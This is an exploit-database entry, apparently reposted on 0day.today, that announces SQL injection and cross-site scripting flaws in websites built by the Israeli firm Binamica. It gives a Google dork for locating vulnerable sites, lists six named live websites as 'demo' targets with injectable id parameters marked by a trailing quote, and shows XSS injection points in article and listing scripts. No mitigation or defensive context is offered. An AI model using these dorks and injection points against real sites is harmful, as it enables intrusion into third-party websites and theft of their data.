id: 19360
date: 09/08/2012
title: Binamic Web Design Israel SQL Injection / XSS Vulnerabilities
author: The Black Devils
cves: 

# Exploit Title: Binamic Web Design Israel SQL Injection / XSS Vulnerabilities
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Software Link: http://www.binamica.co.il/
# Category : [ webapps ]
# Google dork: intext:"Developed by Binamica"
# Tested on: [Windows] & [Ubuntu]

-------------------------------

http:\Localhost\english\ga
-------------------------------
# Demo site:

http://www.givot.co.il/english/article.php?id=114'
http://www.hebron.com/english/article.php?id=725'
http://hebron.org.il/english/article.php?id=184'
or 
http://www.givot.co.il/english/gallery.php?id=45'
http://www.hebron.com/english/gallery.php?id=170'
http://hebron.org.il/english/gallery.php?id=184'
-------------------------------

http://localhost/path/article.php?operation=print&id=[XSS]
http://localhost/path/articles.php?type=[XSS]

#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------



#  0day.today [2023-03-22]  #